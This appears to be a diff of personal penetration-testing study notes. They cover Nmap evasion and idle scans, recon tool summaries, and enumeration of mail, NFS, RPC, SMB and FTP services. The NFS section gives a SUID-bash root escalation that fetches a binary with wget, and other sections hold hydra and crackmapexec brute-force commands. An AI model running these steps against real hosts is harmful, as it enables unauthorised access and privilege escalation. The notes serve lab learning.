You can launch a decoy scan by specifying a specific or random IP address after `-D`. For example, `nmap -D 10.10.0.1,10.10.0.2,ME 10.10.254.161` will make the scan of 10.10.254.161 appear as coming from the IP addresses 10.10.0.1, 10.10.0.2, and then `ME` to indicate that your IP address should appear in the third order. Another example command would be `nmap -D 10.10.0.1,10.10.0.2,RND,RND,ME 10.10.254.161`, where the third and fourth source IP addresses are assigned randomly, while the fifth source is going to be the attackers IP address. In other words, each time you execute the latter command, you would expect two new random IP addresses to be the third and fourth decoy sources.
## Firewall Evasion
#### Evasion
We have already seen some techniques for bypassing firewalls (think stealth scans, along with NULL, FIN and Xmas scans); however, there is another very common firewall configuration which it's imperative we know how to bypass.
Your typical Windows host will, with its default firewall, block all ICMP packets. This presents a problem: not only do we often use _ping_ to manually establish the activity of a target, Nmap does the same thing by default. This means that Nmap will register a host with this firewall configuration as dead and not bother scanning it at all.
So, we need a way to get around this configuration. Fortunately Nmap provides an option for this: `-Pn`, which tells Nmap to not bother pinging the host before scanning it. This means that Nmap will always treat the target host(s) as being alive, effectively bypassing the ICMP block; however, it comes at the price of potentially taking a very long time to complete the scan (if the host really is dead then Nmap will still be checking and double checking every specified port).
It's worth noting that if you're already directly on the local network, Nmap can also use ARP requests to determine host activity.
There are a variety of other switches which Nmap considers useful for firewall evasion. We will not go through these in detail, however, they can be found [here](https://nmap.org/book/man-bypass-firewalls-ids.html).
The following switches are of particular note:
- `-f`:- Used to fragment the packets (i.e. split them into smaller pieces) making it less likely that the packets will be detected by a firewall or IDS.
- An alternative to `-f`, but providing more control over the size of the packets: `--mtu <number>`, accepts a maximum transmission unit size to use for the packets sent. This _must_ be a multiple of 8.
- `--scan-delay <time>ms`:- used to add a delay between packets sent. This is very useful if the network is unstable, but also for evading any time-based firewall/IDS triggers which may be in place.
- `--badsum`:- this is used to generate in invalid checksum for packets. Any real TCP/IP stack would drop this packet, however, firewalls may potentially respond automatically, without bothering to check the checksum of the packet. As such, this switch can be used to determine the presence of a firewall/IDS.
- `--data-lengt`: Hide our trafic with random bytes
**Scan**
- NULL
- Fin
- Xmas
**IPtables scanning evasion**
`iptables -I INPUT -p tcp --dport <port> -j REJECT --reject-with tcp-reset`
#### Fragmented Packets
Nmap provides the option `-f` to fragment packets. Once chosen, the IP data will be divided into 8 bytes or less. Adding another `-f` (`-f -f` or `-ff`) will split the data into 16 byte-fragments instead of 8. You can change the default value by using the `--mtu`; however, you should always choose a multiple of 8.
To properly understand fragmentation, we need to look at the IP header in the figure below. It might look complicated at first, but we notice that we know most of its fields. In particular, notice the source address taking 32 bits (4 bytes) on the fourth row, while the destination address is taking another 4 bytes on the fifth row. The data that we will fragment across multiple packets is highlighted in red. To aid in the reassembly on the recipient side, IP uses the identification (ID) and fragment offset, shown on the second row of the figure below.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/5e55834e2638ba7ec9e84a0900b68ccb.png)
Lets compare running `sudo nmap -sS -p80 10.20.30.144` and `sudo nmap -sS -p80 -f 10.20.30.144`. As you know by now, this will use stealth TCP SYN scan on port 80; however, in the second command, we are requesting Nmap to fragment the IP packets.
In the first two lines, we can see an ARP query and response. Nmap issued an ARP query because the target is on the same Ethernet. The second two lines show a TCP SYN ping and a reply. The fifth line is the beginning of the port scan; Nmap sends a TCP SYN packet to port 80. In this case, the IP header is 20 bytes, and the TCP header is 24 bytes. Note that the minimum size of the TCP header is 20 bytes.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/b218f063a77b8b9867cc8e8f409224b4.png)
With fragmentation requested via `-f`, the 24 bytes of the TCP header will be divided into multiples of 8 bytes, with the last fragment containing 8 bytes or less of the TCP header. Since 24 is divisible by 8, we got 3 IP fragments; each has 20 bytes of IP header and 8 bytes of TCP header. We can see the three fragments between the fifth and the seventh lines.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/953fd599d2afaa8efb36923b02707d2b.png)
Note that if you added `-ff` (or `-f -f`), the fragmentation of the data will be multiples of 16. In other words, the 24 bytes of the TCP header, in this case, would be divided over two IP fragments, the first containing 16 bytes and the second containing 8 bytes of the TCP header.
On the other hand, if you prefer to increase the size of your packets to make them look innocuous, you can use the option `--data-length NUM`, where num specifies the number of bytes you want to append to your packets.
#### Zombie
Spoofing the source IP address can be a great approach to scanning stealthily. However, spoofing will only work in specific network setups. It requires you to be in a position where you can monitor the traffic. Considering these limitations, spoofing your IP address can have little use; however, we can give it an upgrade with the idle scan.
The idle scan, or zombie scan, requires an idle system connected to the network that you can communicate with. Practically, Nmap will make each probe appear as if coming from the idle (zombie) host, then it will check for indicators whether the idle (zombie) host received any response to the spoofed probe. This is accomplished by checking the IP identification (IP ID) value in the IP header. You can run an idle scan using `nmap -sI ZOMBIE_IP 10.10.254.161`, where `ZOMBIE_IP` is the IP address of the idle host (zombie).
The idle (zombie) scan requires the following three steps to discover whether a port is open:
1. Trigger the idle host to respond so that you can record the current IP ID on the idle host.
2. Send a SYN packet to a TCP port on the target. The packet should be spoofed to appear as if it was coming from the idle host (zombie) IP address.
3. Trigger the idle machine again to respond so that you can compare the new IP ID with the one received earlier.
Lets explain with figures. In the figure below, we have the attacker system probing an idle machine, a multi-function printer. By sending a SYN/ACK, it responds with an RST packet containing its newly incremented IP ID.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/a93e181f0effe000554a8b307448bbb2.png)
The attacker will send a SYN packet to the TCP port they want to check on the target machine in the next step. However, this packet will use the idle host (zombie) IP address as the source. Three scenarios would arise. In the first scenario, shown in the figure below, the TCP port is closed; therefore, the target machine responds to the idle host with an RST packet. The idle host does not respond; hence its IP ID is not incremented.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/8e28bf940936ddbc2367b193ea3550b8.png)
In the second scenario, as shown below, the TCP port is open, so the target machine responds with a SYN/ACK to the idle host (zombie). The idle host responds to this unexpected packet with an RST packet, thus incrementing its IP ID.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/2b0de492e2154a30760852e07cebae0e.png)
In the third scenario, the target machine does not respond at all due to firewall rules. This lack of response will lead to the same result as with the closed port; the idle host wont increase the IP ID.
For the final step, the attacker sends another SYN/ACK to the idle host. The idle host responds with an RST packet, incrementing the IP ID by one again. The attacker needs to compare the IP ID of the RST packet received in the first step with the IP ID of the RST packet received in this third step. If the difference is 1, it means the port on the target machine was closed or filtered. However, if the difference is 2, it means that the port on the target was open.
It is worth repeating that this scan is called an idle scan because choosing an idle host is indispensable for the accuracy of the scan. If the “idle host” is busy, all the returned IP IDs would be useless.

View file

@ -0,0 +1,14 @@
## What is Threader3000?
Threader3000 is a script written in Python3 that allows multi-threaded port scanning. The program is interactive and simply requires you to run it to begin. Once started, you will be asked to input an IP address or a FQDN as Threader3000 does resolve hostnames. A full port scan can take as little as 15 seconds, but at max should take less than 1 minute 30 seconds depending on your internet connection.
## Common Use and Commands:
Threader3000 is commonly used by security professionals and penetration testers to scan open port more quickly then a normal Nmap scan
The following are some common commands used in Threader3000:
- To perform scan: `python3 threader3000.py`
## More Information
For more information on Threader3000, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/dievus/threader3000

View file

@ -0,0 +1,35 @@
## What is Gobuster?
Gobuster is an open-source command-line tool used for directory and DNS subdomain brute-forcing. It allows users to discover hidden files and directories on a web server, and find subdomains on a given domain.
The tool works by sending HTTP/HTTPS requests to the web server or DNS queries to the domain name server, and analyzes the responses to determine if there are any hidden files, directories or subdomains.
## Common Use and Commands:
Gobuster is commonly used by security researchers, penetration testers and system administrators to identify potential security vulnerabilities and weaknesses in web applications.
The following are some common commands used in Gobuster:
Scan for directories:
```
gobuster dir -u <url> -w <wordlist>
gobuster dir -u <url> -w <wordlist> -x "html,txt,php,zip,..." -t 25 --timeout Xs --exclude-length X
```
- -u ---> URL
- -w ---> Wordlist
- -x ---> Append at the end of the directory
- -t ---> treats
- --timeout ---> Add some time between respond
- --exclude-lenght ---> Exclude result that has X bytes of data
Scan for subdomains:
```
gobuster dns -d <domain> -w <wordlist>
```
Gobuster supports multiple options and flags to customize the scan, such as setting the user-agent, specifying the proxy, setting the timeout and enabling recursion.
## More Information
For more information on Gobuster, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OJ/gobuster

View file

@ -0,0 +1,33 @@
## What is Amass?
Amass is a popular open-source tool used for reconnaissance and enumeration during security assessments. It is designed to discover and map external assets of an organization, including subdomains, IP addresses, and associated metadata.
The tool utilizes a combination of active and passive reconnaissance techniques, including DNS and zone transfers, web scraping, and web archive searching. It also integrates with various third-party data sources, such as Shodan, Censys, and VirusTotal, to enhance the accuracy and completeness of its findings.
Amass can be used to enumerate APIs, identify SSL/TLS certificates, perform DNS reconnaissance, map network routes, scrape web pages, search web archives, and obtain WHOIS information. It is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors.
## Common Use and Commands:
Amass is commonly used by security professionals, bug bounty hunters, and penetration testers to gather information about their target organization and identify potential attack vectors.
The following are some common commands used in Amass:
#### Subdomain Enumeration:
- Perform a DNS enumeration: `amass enum -d <domain>`
- To use passive DNS enumeration: `amass enum --passive -d <domain>`
- To use active DNS enumeration: `amass enum --active -d <domain>`
- To perform subdomain bruteforcing: `amass enum -d <domain> -brute`
#### Directory Enumeration:
- To brute-force directories and files: `amass enum -active -d <domain> -w <wordlist>`
- To brute-force directories with a defined extension: `amass enum -active -d <domain> -w <wordlist> -dirsearch /path/to/extensions`
- To find URLs with HTTP response code 200: `amass enum -active -d <domain> -w <wordlist> -status-code 200`
#### API Discovery:
- To discover APIs using passive techniques: `amass intel -d <domain> -api`
- To discover APIs using active techniques: `amass intel -d <domain> -api -active`
- To use a custom API key for Shodan: `amass intel -d <domain> -shodan-apikey <API-key>`
Amass supports various options and flags to customize the scan, such as setting the output format, configuring rate limits, and enabling verbose logging.
## More Information
For more information on Amass, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OWASP/Amass

View file

@ -0,0 +1,26 @@
## What is Gobuster?
Gobuster is an open-source command-line tool used for directory and DNS subdomain brute-forcing. It allows users to discover hidden files and directories on a web server, and find subdomains on a given domain.
The tool works by sending HTTP/HTTPS requests to the web server or DNS queries to the domain name server, and analyzes the responses to determine if there are any hidden files, directories or subdomains.
## Common Use and Commands:
Gobuster is commonly used by security researchers, penetration testers and system administrators to identify potential security vulnerabilities and weaknesses in web applications.
The following are some common commands used in Gobuster:
Scan for directories:
```
gobuster dir -u <url> -w <wordlist>
```
Scan for subdomains:
```
gobuster dns -d <domain> -w <wordlist>
```
Gobuster supports multiple options and flags to customize the scan, such as setting the user-agent, specifying the proxy, setting the timeout and enabling recursion.
## More Information
For more information on Gobuster, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OJ/gobuster

View file

@ -0,0 +1,26 @@
## What is Google dorking?
Google dorking, also known as Google hacking or Google search hacking, is a technique used by security professionals to identify potential security vulnerabilities and misconfigurations in web applications.
It involves using advanced search operators in Google search queries to find specific information that is not easily accessible through normal search methods. This information can include sensitive files, directories, login pages, vulnerable scripts, and other confidential data that can be used for malicious purposes if accessed by unauthorized users.
## Common Use and Commands:
Google dorking is commonly used by security professionals, penetration testers, and ethical hackers to find vulnerabilities and misconfigurations in web applications.
The following are some common Google dorking commands:
- To search for a specific file type: `filetype:<extension> <query>`
- To search for directories and files with a specific name: `intitle:<name> inurl:<name>`
- To search for login pages: `inurl:login <site>`
- To search for SQL injection vulnerabilities: `inurl:index.php?id= <site>`
- To search for sensitive data: `intext:<sensitive-data>`
These are just a few examples of the commands that can be used with Google dorking. The technique supports various search operators and modifiers that can be used to refine and customize the search queries.
## More Information
For more information on Google dorking, including the latest updates and examples of advanced search queries, please refer to the following resources:
- Google Hacking Database: [https://www.exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database)
- Google Advanced Search: [https://www.google.com/advanced_search](https://www.google.com/advanced_search)
- Google Dorking HELPER: https://dorksearch.com/
- Google Dorks List: [https://www.exploit-db.com/google-dorks](https://www.exploit-db.com/google-dorks)

View file

@ -0,0 +1,12 @@
## What is Wayback Crawler
The tool initially discovers subdomains, and subsequently searches the Wayback Machine for all the associated URLs to identify any vulnerable parameters that might have been exposed.
## Common Use and Commands:
Launch the program
```
python3 wayback_crawler.py ---> Launch the script
```
## More Information
For more information on Wayback-Crawler, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/Hacking-Notes/Wayback-Crawler

View file

@ -0,0 +1,21 @@
## What is Nikto?
Nikto is an open-source web server scanner that is designed to identify potential vulnerabilities and security issues in web applications. It is a command-line tool that can be used to scan web servers and web applications for known vulnerabilities, misconfigurations, and other security weaknesses.
Nikto works by performing various tests and checks on the target web server or application, including looking for outdated software versions, known vulnerabilities, weak passwords, and other common security issues.
## Common Use and Commands:
Nikto is commonly used by security professionals, system administrators, and penetration testers to scan web applications and identify potential security vulnerabilities.
The following are some common commands used in Nikto:
- To perform a basic scan of a target web server: `nikto -h <target>`
- To perform a scan with SSL enabled: `nikto -h <target> -ssl`
- To specify a custom port for the scan: `nikto -h <target> -p <port>`
- To perform a scan with authentication credentials: `nikto -h <target> -id <username:password>`
- To perform a scan with a specific plugin: `nikto -h <target> -plugins <plugin-name>`
Nikto supports various options and flags that can be used to customize the scan and generate detailed reports, such as setting the output format, enabling verbose logging, and excluding certain tests.
## More Information
For more information on Nikto, including the latest updates and documentation, please visit the project's official website: https://github.com/sullo/nikto

View file

@ -0,0 +1,81 @@
## What is POP3
Post Office Protocol version 3 (POP3) is a protocol used to download the email messages from a Mail Delivery Agent (MDA) server, as shown in the figure below. The mail client connects to the POP3 server, authenticates, downloads the new email messages before (optionally) deleting them.
- More Information
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5f04259cf9bf5b57aed2c476/room-content/ed910ad418376edc846846fc2a0dd3f6.png)
The example below shows what a POP3 session would look like if conducted via a Telnet client. First, the user connects to the POP3 server at the POP3 default port 110. Authentication is required to access the email messages; the user authenticates by providing his username `USER frank` and password `PASS D2xc9CgD`. Using the command `STAT`, we get the reply `+OK 1 179`; based on [RFC 1939](https://datatracker.ietf.org/doc/html/rfc1939), a positive response to `STAT` has the format `+OK nn mm`, where _nn_ is the number of email messages in the inbox, and _mm_ is the size of the inbox in octets (byte). The command `LIST` provided a list of new messages on the server, and `RETR 1` retrieved the first message in the list. We dont need to concern ourselves with memorizing these commands; however, it is helpful to strengthen our understanding of such protocol.
Pentester Terminal
```shell-session
pentester@TryHackMe$ telnet 10.10.142.15 110
Trying 10.10.142.15...
Connected to MACHINE_IP.
Escape character is '^]'.
+OK MACHINE_IP Mail Server POP3 Wed, 15 Sep 2021 11:05:34 +0300
USER frank
+OK frank
PASS D2xc9CgD
+OK 1 messages (179) octets
STAT
+OK 1 179
LIST
+OK 1 messages (179) octets
1 179
.
RETR 1
+OK
From: Mail Server
To: Frank
subject: Sending email with Telnet
Hello Frank,
I am just writing to say hi!
.
QUIT
+OK MACHINE_IP closing connection
Connection closed by foreign host.
```
The example above shows that the commands are sent in cleartext. Using Telnet was enough to authenticate and retrieve an email message. As the username and password are sent in cleartext, any third party watching the network traffic can steal the login credentials.
## Find POP3 Port
Nmap
```
nmap -sV -SC IP -p110
```
- Possible to find POP3 on an other port
## Connection
- Telnet
```Terminal
telnet [ip] 110
```
- POP3 Commands
```Terminal
USER frank
+OK frank #Machine Response
PASS D2xc9CgD
+OK 1 messages (179) octets #Machine Response
STAT
+OK 1 179 #Machine Response
LIST
+OK 1 messages (179) octets #Machine Response
1 179
.
RETR 1
+OK #Machine Response
From: Mail Server
To: Frank
subject: Sending email with Telnet
Hello Frank,
I am just writing to say hi!
.
QUIT
+OK MACHINE_IP closing connection #Machine Response
Connection closed by foreign host.
```

View file

@ -0,0 +1,92 @@
## What is NSF
NFS stands for "**Network File System**" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.
- **How does NFS work?**
We don't need to understand the technical exchange in too much detail to be able to exploit NFS effectively- however if this is something that interests you, I would recommend this resource: [https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html](https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html)
First, the client will request to mount a directory from a remote host on a local directory just the same way it can mount a physical device. The mount service will then act to connect to the relevant mount daemon using RPC.
The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.
If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:
-  The file handle
-  The name of the file to be accessed
-  The user's, user ID
-  The user's group ID
These are used in determining access rights to the specified file. This is what controls user permissions, I.E read and write of files.
- **What runs NFS?**
Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.
A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows Server to access files stored on a non-Windows NFS server.
- **More Information:**
Here are some resources that explain the technical implementation, and working of, NFS in more detail than I have covered here.
[https://www.datto.com/library/what-is-nfs-file-share](https://www.datto.com/library/what-is-nfs-file-share)
[http://nfs.sourceforge.net/](http://nfs.sourceforge.net/)
[https://wiki.archlinux.org/index.php/NFS](https://wiki.archlinux.org/index.php/NFS)
## Find NSF Port
Nmap
```
nmap -sV -SC IP -p111
```
- Possible to find NSF on an other port
## Attack & Connection
- Mounting Vulnerable Shared Folder (NSF-COMMON)
```Terminal
sudo mount -t nfs IP:FOLDER /tmp/mount/ -nolock (Connect to the shared file)
- /usr/sbin/showmount -e [IP] (List the NFS shares)
```
- mount ---> Execute the mount command
- -t nfs ---> Type of device to mount, then specify that it's NFS
- IP:share ---> Target server IP and vulnerable share folder
- -nolock ---> Specifies not to use NLM Locking
More information about NSF-COMMON ---> https://vitux.com/install-nfs-server-and-client-on-ubuntu/
- Exploitation (Set**SUID**)
```Terminal
Download Bash Script
- cp ~/Downloads/bash /DESTINATION FOLDER
- chmod +x bash && chmod +s bash
- ls -la bash (check file permission)
- ./bash -p (Run script with persistence (On SSH low privilege))
```
## More information
**What is root_squash?**
By default, on NFS shares- Root Squashing is enabled, and prevents anyone connecting to the NFS share from having root access to the NFS volume. Remote root users are assigned a user “nfsnobody” when connected, which has the least local privileges. Not what we want. However, if this is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system.
**SUID**
So, what are files with the SUID bit set? Essentially, this means that the file or files can be run with the permissions of the file(s) owner/group. In this case, as the super-user. We can leverage this to get a shell with these privileges!
**Method**
This sounds complicated, but really- provided you're familiar with how SUID files work, it's fairly easy to understand. We're able to upload files to the NFS share, and control the permissions of these files. We can set the permissions of whatever we upload, in this case a bash shell executable. We can then log in through SSH, as we did in the previous task- and execute this executable to gain a root shell!
**The Executable**
Due to compatibility reasons, we'll use a standard Ubuntu Server 18.04 bash executable, the same as the server's- as we know from our nmap scan. You can download it [here](https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash). If you want to download it via the command line, be careful not to download the github page instead of the raw script. You can use `wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash`.
**Mapped Out Pathway:**
If this is still hard to follow, here's a step by step of the actions we're taking, and how they all tie together to allow us to gain a root shell:
![[Pasted image 20220922212950.png]]
- Reverse Shell ---> https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp

View file

@ -0,0 +1,24 @@
## What is RPCbind
The **rpcbind** utility is a server that converts RPC program numbers into universal addresses. It must be running on the host to be able to make RPC calls on a server on that machine.
When an RPC service is started, it tells **rpcbind** the address at which it is listening, and the RPC program numbers it is prepared to serve. When a client wishes to make an RPC call to a given program number, it first contacts **rpcbind** on the server machine to determine the address where RPC requests should be sent.
The **rpcbind** utility should be started before any other RPC service. Normally, standard RPC servers are started by port monitors, so **rpcbind** must be started before port monitors are invoked.
When **rpcbind** is started, it checks that certain name-to-address translation-calls function correctly. If they fail, the network configuration databases may be corrupt. Since RPC services cannot function correctly in this situation, **rpcbind** reports the condition and terminates.
The **rpcbind** utility can only be started by the super-user.
###Find RPCbind Port
Nmap
```
nmap -sV -SC IP -p111
```
- Possible to find RPCbind on an other port
## Connection
- RPCbind (Display Directory)
```Terminal
showmount -e IP
```

View file

@ -0,0 +1,36 @@
## What is MSRPC
Microsoft Remote Procedure Call, also known as a function call or a subroutine call, is [a protocol](http://searchmicroservices.techtarget.com/definition/Remote-Procedure-Call-RPC) that uses the client-server model that enables one program to request a service from a program on another computer, without having to understand the details of that computer's network.
## Find MSRPC Port
Nmap
```
nmap -sV -SC IP -p135
```
- Possible to find MSRPC on an other port
## Attack
- User Enumeration
```Terminal
Enum4Linux ---> https://github.com/CiscoCXSecurity/enum4linux
```
Enum4Linux Commands
- -U             get userlist
- -M             get machine list
- -N             get namelist dump (different from -U and-M)
- -S             get sharelist
- -P             get password policy information
- -G             get group and member list
- -a             all of the above (full basic enumeration)
- Enumeration PC Element
```Terminal
IOXIDResolver ---> https://github.com/mubix/IOXIDResolver)
```
- Extra
- In some case, you might found some IPV6 address. Most of the IPV6 address are not setup for firewall since people mostly focus on IPV4

View file

@ -0,0 +1,36 @@
## Commands
Command (Connection)
```
crackmapexec smb IP -u '' -p ''
```
- -u ---> Username
- -p ---> Passowrd
Trying **NULL** and **guest** username to login are a good thing to test when trying to connect to a target via SMB
Command (Brute Force)
```
crackmapexec smb IP -u USERNAMES.txt -p PASSWORD.txt --continue-on-success
```
- -u ---> Usernames
- -p ---> Passowrds
- --continue-on-success ---> Continue enumaration after finding one valid user
Domain admin will be flag with the keyword <font color="orange">(Pwn3d!)</font>
Command (Shares Enumeration)
```
# Take note you need a valid account to perform the following
crackmapexec smb IP -u '' -p '' --shares
```
- -u ---> Username
- -p ---> Passowrd
- --shares ---> Enumerate shares access (Show folders & permissions)
## More Information
More information ---> [Crackmapexec]([[Red Team/6 - Machine/3 - Active Directory/General/Tools/TOP/1 - Crackmapexec]])

View file

@ -0,0 +1,92 @@
## What is SMB
SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [[source](https://searchnetworking.techtarget.com/definition/Server-Message-Block-Protocol)]
Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.
The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.
- **How does SMB work?**
![](https://i.imgur.com/XMnru12.png)
Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.
- **What runs SMB?**
Microsoft Windows operating systems since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports the SMB protocol, was released for Unix systems.
- **SMB Ports**
SMB run on the port 139 and 445
## Find SMB Port
- Nmap
```Terminal
nmap -sV -sC IP -p110
```
- Possible to find SMB on an other port
## Connection
### Linux connection
- Enumeration (Need to know the share location & name of interesting file)
```Terminal
Enum4Linux ---> https://github.com/CiscoCXSecurity/enum4linux
```
Enum4Linux Commands
- -U             get userlist
- -M             get machine list
- -N             get namelist dump (different from -U and-M)
- -S             get sharelist
- -P             get password policy information
- -G             get group and member list
- -a             all of the above (full basic enumeration)
- SMBclient
```Terminal
- smbclient -U USER '//[IP]/[SHARE]' ---> Connect
- smbclient //<ip>/anonymous` ---> Find Files
- smbget -R smb://<ip>/anonymous ---> Download all available files
- smbclient -U milesdyson '\\10.10.33.22\milesdyson ---> Example
```
- -U [name] ---> Specify the user
- -p [port] ---> Specify the port
- SMB Terminal (Important commands)
```Temrinal
- put ---> Upload Text
- get ---> Download text
- more ---> Read text
```
- Exploit
https://www.cvedetails.com/cve/CVE-2017-7494/
### Windows Connection
- Crackmapexec (VERY GOOD)
```
crackmapexec smb IP -u '' -p '' -M spider_plus
crackmapexec smb IP -u 'guest' -p '' -M spider_plus
```
Trying no user and guest to see if enable on machine
- -M spider_plus ---> Module in crackmapexec to map all directory we have read access and return the data in a json file
- It should return the json file in the /tmp/cme_spider_plus/IP.json
- You can then run the following command to see the result (cat /tmp/cme_spider_plus/IP.json |jq '. |map_values(keys)')
- SMBmap
```Terminal
smbmap -H IP -d DOMAIN.local -u '' -p ''
```
- -u [name] ---> Specify the user (empty = Anonymous)
- -p [port] ---> Specify the port (empty = Anonymous)

View file

@ -0,0 +1,29 @@
## General Commands
- Nmap (SCRIPT)
```Terminal
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse IP ---> (Enum Users)
```
- SMB
```Terminal
smbclient //<ip>/anonymous (Find public files)
smbget -R smb://<ip>/anonymous (Download Files available) or simply `get ELEMENT`
```
## What is Samba
![](https://i.imgur.com/O8S93Kr.png)
Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.
Samba is based on the common client/server protocol of Server Message Block (SMB). SMB is developed only for Windows, without Samba, other computer platforms would be isolated from Windows machines, even if they were part of the same network.
Using nmap we can enumerate a machine for SMB shares.
SMB has two ports, 445 and 139.
![](https://i.imgur.com/bkgVNy3.png)

View file

@ -0,0 +1,80 @@
## What is IMAP
Internet Message Access Protocol (IMAP) is more sophisticated than POP3. IMAP makes it possible to keep your email synchronized across multiple devices (and mail clients). In other words, if you mark an email message as read when checking your email on your smartphone, the change will be saved on the IMAP server (MDA) and replicated on your laptop when you synchronize your inbox.
Lets take a look at sample IMAP commands. In the console output below, we use Telnet to connect to the IMAP servers default port, and then we **authenticate using** `LOGIN username password`. IMAP requires each command to be preceded by a random string to be able to track the reply. So we added `c1`, then `c2`, and so on. Then we listed our mail folders using `LIST "" "*"`, before checking if we have any new messages in the inbox using `EXAMINE INBOX`. We dont need to memorize these commands; however, we are simply providing the example below to give a vivid image of what happens when the mail client communicates with an IMAP server.
Pentester Terminal
```shell-session
pentester@TryHackMe$ telnet 10.10.142.15 143
Trying 10.10.142.15...
Connected to MACHINE_IP.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
c1 LOGIN frank D2xc9CgD
* OK [ALERT] Filesystem notification initialization error -- contact your mail administrator (check for configuration errors with the FAM/Gamin library)
c1 OK LOGIN Ok.
c2 LIST "" "*"
* LIST (\HasNoChildren) "." "INBOX.Trash"
* LIST (\HasNoChildren) "." "INBOX.Drafts"
* LIST (\HasNoChildren) "." "INBOX.Templates"
* LIST (\HasNoChildren) "." "INBOX.Sent"
* LIST (\Unmarked \HasChildren) "." "INBOX"
c2 OK LIST completed
c3 EXAMINE INBOX
* FLAGS (\Draft \Answered \Flagged \Deleted \Seen \Recent)
* OK [PERMANENTFLAGS ()] No permanent flags permitted
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 631694851] Ok
* OK [MYRIGHTS "acdilrsw"] ACL
c3 OK [READ-ONLY] Ok
c4 LOGOUT
* BYE Courier-IMAP server shutting down
c4 OK LOGOUT completed
Connection closed by foreign host.
```
It is clear that IMAP sends the login credentials in cleartext, as we can see in the command `LOGIN frank D2xc9CgD`. Anyone watching the network traffic would be able to know Franks username and password.
## Find IMAP Port
- Nmap
```Terminal
nmap -sV -sC IP -p110
```
- Possible to find IMAP on an other port
## Attack
- Brute Force
```Terminal
hydra -l username -P PASSWORD-LIST.txt -f IP imap
```
## Connection
- IMAP Commands
```Terminal
USER frank
+OK frank #Machine Response
PASS D2xc9CgD
+OK 1 messages (179) octets #Machine Response
STAT
+OK 1 179 #Machine Response
LIST
+OK 1 messages (179) octets #Machine Response
1 179
.
RETR 1
+OK #Machine Response
From: Mail Server
To: Frank
subject: Sending email with Telnet
Hello Frank,
I am just writing to say hi!
.
QUIT
+OK MACHINE_IP closing connection #Machine Response
Connection closed by foreign host.
```

View file

@ -0,0 +1,59 @@
## What is FTP
File Transfer Protocol (FTP) is, as the name suggests , a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and- as we'll come on to later- relays commands and data in a very efficient way.
- How does FTP work?****
A typical FTP session operates using two channels:
- a command (sometimes called the control) channel
- a data channel.
As their names imply, the command channel is used for transmitting commands as well as replies to those commands, while the data channel is used for transferring data.
FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.
While the session is open, the client may execute FTP commands on the server.
- Active vs Passive
The FTP server may support either Active or Passive connections, or both. 
- In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it. 
- In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it. 
This separation of command information and data into separate channels is a way of being able to send commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn't be efficient for either large file transfers, or slow internet connections.
- **More Details:**
You can find more details on the technical function, and implementation of, FTP on the Internet Engineering Task Force website: [https://www.ietf.org/rfc/rfc959.txt](https://www.ietf.org/rfc/rfc959.txt). The IETF is one of a number of standards agencies, who define and regulate internet standards.
## Find FTP Port
Nmap
```
